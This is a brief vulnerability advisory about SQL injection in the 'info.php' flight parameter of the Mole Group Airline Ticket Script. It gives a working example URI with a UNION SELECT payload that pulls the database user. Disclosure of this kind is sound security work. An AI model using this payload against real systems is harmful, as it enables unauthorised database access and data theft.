Mole Group Airline Ticket Script 'info.php' SQL Injection Vulnerability

Mole Group Airline Ticket Script 'info.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.exmaple.com/info.php?flight=-60'+union+select+convert(user()+using+latin1),0,0,0,0,0,0,0,0,0,0,0,0/*